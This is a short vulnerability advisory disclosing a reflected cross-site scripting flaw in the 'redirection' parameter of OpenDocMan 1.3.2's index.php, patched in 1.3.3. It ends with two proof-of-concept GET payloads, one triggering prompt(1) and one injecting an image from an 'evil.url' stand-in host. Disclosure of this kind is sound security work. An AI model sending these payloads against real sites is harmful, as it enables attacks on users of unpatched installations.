OpenDocMan version 1.3.2. suffers from a cross site scripting vulnerability.
f87e86cc7aa648b71918f17acbca3b4b1642384f56f726e37852d5364e6901bb
Title: OpenDocMan 1.3.2 - Cross Site Scripting (Reflected)
Disclosed: 9/2/15
Vendor Patched: Patched in version 1.3.3
Published: 9/2/15
Credit: Matt Landers - matt@mjltech.net
Original Advisory: http://mjltech.net/adv/MJLTECH%20-%20OpenDocMan%201.3.2%20XSS.txt
======================================================================
Confirmed Vulnerable: OpenDocMan 1.3.2
Vendor: http://www.opendocman.com/
Description: "OpenDocMan is a free, web-based, open source document management system (DMS) written in PHP designed to comply with ISO 17025 and OIE standard for document management. It features web based access, fine grained control of access to files, and automated install and upgrades."
======================================================================
Vulnerable file: index.php
Vulnerable parameter: redirection
Description of vulnerability: The parameter 'redirection'is vulnerable to XSS via GET request from non-authenticated user.
Proof of Concept: GET http://www.xxxx.com/odm/index.php?redirection=" style="width:expression(prompt(1));
Proof of Concept: GET http://www.xxxx.com/odm/index.php?redirection="></input><img src=http://www.evil.url/hacked.jpg>